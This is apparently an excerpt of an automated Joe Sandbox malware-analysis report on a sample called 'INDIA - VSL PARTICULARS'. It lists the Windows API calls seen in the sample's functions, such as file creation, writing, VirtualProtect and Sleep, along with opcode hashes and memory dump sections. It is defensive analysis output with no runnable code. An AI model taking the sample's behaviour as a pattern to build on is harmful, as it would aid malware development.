                              • Opcode ID: ced410c349f54cf5afb894e4facd1df4a4f56f438d67fe37ea70020fd5d89546
                              • Instruction ID: 9fbe2eaaa5ffb99098057fa667d4f29c0aa55754a5137076743fac66577e99fa
                              • Opcode Fuzzy Hash: ced410c349f54cf5afb894e4facd1df4a4f56f438d67fe37ea70020fd5d89546
                              • Instruction Fuzzy Hash: D8F05431554300AAE624D7A18D41F9B76A89F98784F40482EB641962E1EB78D444CB5A
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: ClearVariant
                              • String ID:
                              • API String ID: 1473721057-0
                              • Opcode ID: 11f6b6e535ec7b80c381992ec33a5bd2d356ebd5842892795b93a7d01dafaf0a
                              • Instruction ID: 76271617df0236ab3ccd2777984eb13d60b28668e4953fb9a85eec064aa2abc3
                              • Opcode Fuzzy Hash: 11f6b6e535ec7b80c381992ec33a5bd2d356ebd5842892795b93a7d01dafaf0a
                              • Instruction Fuzzy Hash: F891A370A00204DFDB14DF65D884AAAB3B5EF09304F24C56BE915AB391D739EC41CBAE
                              APIs
                              • __wsplitpath.LIBCMT ref: 004678F7
                                • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                              • GetLastError.KERNEL32(00000000,00000000), ref: 004679C7
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: ErrorLast__wsplitpath_malloc
                              • String ID:
                              • API String ID: 4163294574-0
                              • Opcode ID: 466b4abea8eb3f9882cf6d05d385968ec72279f5f07066920500c3d4079e3d60
                              • Instruction ID: 5ded281afda408fdcd401bf2365ceabb828b89a129c607e264fb1023d06c7d2e
                              • Opcode Fuzzy Hash: 466b4abea8eb3f9882cf6d05d385968ec72279f5f07066920500c3d4079e3d60
                              • Instruction Fuzzy Hash: FB5126712083018BD710EF75C881A5BB3E5AF84318F044A6EF9559B381EB39ED09CB97
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: _memmove
                              • String ID:
                              • API String ID: 4104443479-0
                              • Opcode ID: a8f3b2a069b791166e01f79de9e5757f548ca94e92269194e8fe688370fda172
                              • Instruction ID: 2565b1472f88146c75409e19c065a4aacb94a5f6c219594ae44f545f2623c2f3
                              • Opcode Fuzzy Hash: a8f3b2a069b791166e01f79de9e5757f548ca94e92269194e8fe688370fda172
                              • Instruction Fuzzy Hash: 85412871D00104AFDB10AF15C881BAE7B74AF4670CF14C05AFA055B342E63DA946CBAA
                              APIs
                                • Part of subcall function 0040F6F0: _wcslen.LIBCMT ref: 0040F705
                                • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,00454478,?,00000000,?,?), ref: 0040F71E
                                • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,00000000,?,?,?,?), ref: 0040F747
                              • _strcat.LIBCMT ref: 0040F786
                                • Part of subcall function 0040F850: _strlen.LIBCMT ref: 0040F858
                                • Part of subcall function 0040F850: _sprintf.LIBCMT ref: 0040F9AE
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: ByteCharMultiWide$_sprintf_strcat_strlen_wcslen
                              • String ID:
                              • API String ID: 3199840319-0
                              • Opcode ID: bd3755d61cabc1630a419da0a5008bdf21fb0fae9682b7453e2f960da4ed9882
                              • Instruction ID: aac9d08775c2cbfae45fd546c2dd5c585d34072f6b495fb7426f91ad36779b1c
                              • Opcode Fuzzy Hash: bd3755d61cabc1630a419da0a5008bdf21fb0fae9682b7453e2f960da4ed9882
                              • Instruction Fuzzy Hash: 7B2148B260825027D724EF3A9C82A6EF2D4AF85304F14893FF555C22C2F738D554879A
                              APIs
                              • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,0040DE74,?,00000001,?,00403423,?), ref: 0040F13A
                              • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,0040DE74,?,00000001,?,00403423,?), ref: 00426326
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: CreateFile
                              • String ID:
                              • API String ID: 823142352-0
                              • Opcode ID: 01c8104855b6be3cf9f3f51c38ffad3c9237c0860841684a852cd2675ef3d23e
                              • Instruction ID: 8a88c5525f76e0b0fff62cf48ad84dc7055e673dbb4ccc29545257d8619b8f55
                              • Opcode Fuzzy Hash: 01c8104855b6be3cf9f3f51c38ffad3c9237c0860841684a852cd2675ef3d23e
                              • Instruction Fuzzy Hash: 16011D70784310BAF2305A68DD0BF5266546B45B24F20473ABBE5BE2D1D2F86885870C
                              APIs
                                • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                              • __lock_file.LIBCMT ref: 00414A8D
                                • Part of subcall function 00415471: __lock.LIBCMT ref: 00415496
                              • __fclose_nolock.LIBCMT ref: 00414A98
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                              • String ID:
                              • API String ID: 2800547568-0
                              • Opcode ID: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
                              • Instruction ID: d9443fdd3ee0a3059f5d17ec53abbfe2105cc8a5d10ddad395bff0ae1f283336
                              • Opcode Fuzzy Hash: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
                              • Instruction Fuzzy Hash: EEF0F6308417019AD710AB7588027EF37A09F41379F22864FA061961D1C73C85C29B5D
                              APIs
                              • __lock_file.LIBCMT ref: 00415012
                              • __ftell_nolock.LIBCMT ref: 0041501F
                                • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: __ftell_nolock__getptd_noexit__lock_file
                              • String ID:
                              • API String ID: 2999321469-0
                              • Opcode ID: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
                              • Instruction ID: e3e7bc223609ce985a1750c66bb322057640979a4505571362f253753ce4bf01
                              • Opcode Fuzzy Hash: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
                              • Instruction Fuzzy Hash: 64F03030900605EADB107FB5DD027EE3B70AF443A8F20825BB0259A0E1DB7C8AC29A59
                              APIs
                                • Part of subcall function 03F1DDA8: GetFileAttributesW.KERNELBASE(?), ref: 03F1DDB3
                              • CreateDirectoryW.KERNELBASE(?,00000000), ref: 03F1E667
                              Memory Dump Source
                              • Source File: 00000000.00000002.2191192531.0000000003F1D000.00000040.00000020.00020000.00000000.sdmp, Offset: 03F1D000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_3f1d000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: AttributesCreateDirectoryFile
                              • String ID:
                              • API String ID: 3401506121-0
                              • Opcode ID: 96a425f63008aa5d8586ebd0b0edae7eacd26f049704a72ab2b2fecfa9277b2c
                              • Instruction ID: 0042a4b7a47e82483e3bb131c3fe1f1420e92d40bcf3856be091fef1094406dc
                              • Opcode Fuzzy Hash: 96a425f63008aa5d8586ebd0b0edae7eacd26f049704a72ab2b2fecfa9277b2c
                              • Instruction Fuzzy Hash: 1B51A631E1020D96EF14EFB0D945BEF7379EF58300F0045A9A909E7280EB79AB54CBA5
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: _memmove
                              • String ID:
                              • API String ID: 4104443479-0
                              • Opcode ID: 64fdff3ae94ab83457d8603152ae0d5fedf77ee6c12e0e45d0860bef15caa14f
                              • Instruction ID: 6397ebbfaf442e519c955e074037b65107783079284990db5ef0c3dd021860ed
                              • Opcode Fuzzy Hash: 64fdff3ae94ab83457d8603152ae0d5fedf77ee6c12e0e45d0860bef15caa14f
                              • Instruction Fuzzy Hash: 36317371E00209EBDF009F52E9866AEFBF4FF40740F2189BED855E2650E7389990D759
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: ProtectVirtual
                              • String ID:
                              • API String ID: 544645111-0
                              • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                              • Instruction ID: 21b87f0337b3904faf2e49e7d89a80b8c5538d611ad57d97d778efbd48141229
                              • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                              • Instruction Fuzzy Hash: 8131F770A00105DBC718DF88E590AAAF7B1FB49310B6486A6E409CF355DB78EDC1CBD9
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b88f9543b806201cae42d4d121fbe4b2eaeb6b479e9688354450343e49ff2077
                              • Instruction ID: 427b4a632c312742ac0951887501238d3178a51c37fde1d0fd35c98815df3d2a
                              • Opcode Fuzzy Hash: b88f9543b806201cae42d4d121fbe4b2eaeb6b479e9688354450343e49ff2077
                              • Instruction Fuzzy Hash: 21119674200201ABDB249F36D984E26B3A5AF45304B244D2FF9C5D7790DB7CE881DB5E
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 53ac66c0a220e583b8bd8a833cb4d0ab2488ecf71834bb63135a5f6edfec8b4a
                              • Instruction ID: fe3c5e01fee558804f1d0cd68762aa03bf47037873853bda5dcd607d85013340
                              • Opcode Fuzzy Hash: 53ac66c0a220e583b8bd8a833cb4d0ab2488ecf71834bb63135a5f6edfec8b4a
                              • Instruction Fuzzy Hash: 2D118B352046019FDB10DF69D884E96B3E9AF8A314F14856EFD298B362CB35FC41CB95
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: __lock_file
                              • String ID:
                              • API String ID: 3031932315-0
                              • Opcode ID: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
                              • Instruction ID: 324047821ed349453e17c5e7f52af34d31ade4ebcb64e32b23ce3c6ad3b356a0
                              • Opcode Fuzzy Hash: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
                              • Instruction Fuzzy Hash: FF011E71801219EBCF21AFA5C8028DF7B71AF44764F11851BF824551A1E7398AE2DBD9
                              APIs
                              • WriteFile.KERNELBASE(?,?,?,?,00000000,?,?,?,004263D0,?,00487ACC,00000003,0040DE90,?,?,00000001), ref: 00443E54
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: FileWrite
                              • String ID:
                              • API String ID: 3934441357-0
                              • Opcode ID: 873a582ac05df194872d3361efdc1b64d97226b1633050e8059638026df5ad0f
                              • Instruction ID: f8d6e32d6ecef3e6c51c5ea05c7ff41eb941b2b6d152ec47b845c679c5cedb0e
                              • Opcode Fuzzy Hash: 873a582ac05df194872d3361efdc1b64d97226b1633050e8059638026df5ad0f
                              • Instruction Fuzzy Hash: 6BE01276100318ABDB10DF98D844FDA77BCEF48765F10891AFA048B200C7B4EA908BE4
                              APIs
                              • GetFileAttributesW.KERNELBASE(?), ref: 03F1DDB3
                              Memory Dump Source
                              • Source File: 00000000.00000002.2191192531.0000000003F1D000.00000040.00000020.00020000.00000000.sdmp, Offset: 03F1D000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_3f1d000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: AttributesFile
                              • String ID:
                              • API String ID: 3188754299-0
                              • Opcode ID: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
                              • Instruction ID: 904c6375b5b40a4aef5bad50c18cfd8e65c632072b7431d078b222ea8b0a97e8
                              • Opcode Fuzzy Hash: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
                              • Instruction Fuzzy Hash: 2FE08C3191960CEBCF20CBA8E904AF973B8EB04320F104658B806C32C0D5308A20D750
                              APIs
                              • GetFileAttributesW.KERNELBASE(?), ref: 03F1DD83
                              Memory Dump Source
                              • Source File: 00000000.00000002.2191192531.0000000003F1D000.00000040.00000020.00020000.00000000.sdmp, Offset: 03F1D000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_3f1d000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: AttributesFile
                              • String ID:
                              • API String ID: 3188754299-0
                              • Opcode ID: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
                              • Instruction ID: 184a30efc64d8e1917cd0c12343c687c5d6f68acfb25acbbd22485ebe1f0e8d5
                              • Opcode Fuzzy Hash: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
                              • Instruction Fuzzy Hash: 05D0A73191520CEBCB10CFB4ED049ED73BCDB05324F004765FD15C3280D53699109750
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: __wfsopen
                              • String ID:
                              • API String ID: 197181222-0
                              • Opcode ID: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                              • Instruction ID: b34ddb7a850719c89311ce964fc9f65e9e9400c6a390d5c1cbb008c3125e494a
                              • Opcode Fuzzy Hash: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                              • Instruction Fuzzy Hash: 82C092B244020C77CF112A93EC02F9A3F1E9BC0764F058021FB1C1A162AA77EAA19689
                              APIs
                              • CloseHandle.KERNELBASE(?,?,00426FBF), ref: 0040DA3D
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: CloseHandle
                              • String ID:
                              • API String ID: 2962429428-0
                              • Opcode ID: 4893ac657bcef9b9334a0355bd28ce0f0291ef024a1c9f1561977d8c5be9d70a
                              • Instruction ID: 552ddd844a8bbede063c80161f66c4637379340f91e2bb70a518b226642b2913
                              • Opcode Fuzzy Hash: 4893ac657bcef9b9334a0355bd28ce0f0291ef024a1c9f1561977d8c5be9d70a
                              • Instruction Fuzzy Hash: B9E045B4A04B008BC6308F5BE444416FBF8EEE46203108E1FD4A6C2A64C3B4A1498F50
                              APIs
                              • Sleep.KERNELBASE(000001F4), ref: 03F1F779
                              Memory Dump Source
                              • Source File: 00000000.00000002.2191192531.0000000003F1D000.00000040.00000020.00020000.00000000.sdmp, Offset: 03F1D000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_3f1d000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Sleep
                              • String ID:
                              • API String ID: 3472027048-0
                              • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                              • Instruction ID: 902a4af189e762bb1850e40a69ee98201afdc0f10ec5713e5cd71323018a28d6
                              • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                              • Instruction Fuzzy Hash: 52E0BF7594020EEFDB00DFA8D5496DD7BB4FF04311F1046A1FD05D7680DB309E648A62
                              APIs
                              • Sleep.KERNELBASE(000001F4), ref: 03F1F779
                              Memory Dump Source
                              • Source File: 00000000.00000002.2191192531.0000000003F1D000.00000040.00000020.00020000.00000000.sdmp, Offset: 03F1D000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_3f1d000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Sleep
                              • String ID:
                              • API String ID: 3472027048-0
                              • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                              • Instruction ID: 1ea5158084c284f35f14d6b7a6d2ca46abf4f1350be1fecc6c18f04a605b3c66
                              • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                              • Instruction Fuzzy Hash: 43E0E67594020EDFDB00DFB8D54969D7BB4FF04301F1042A1FD05D2280D6309D608A62
                              APIs
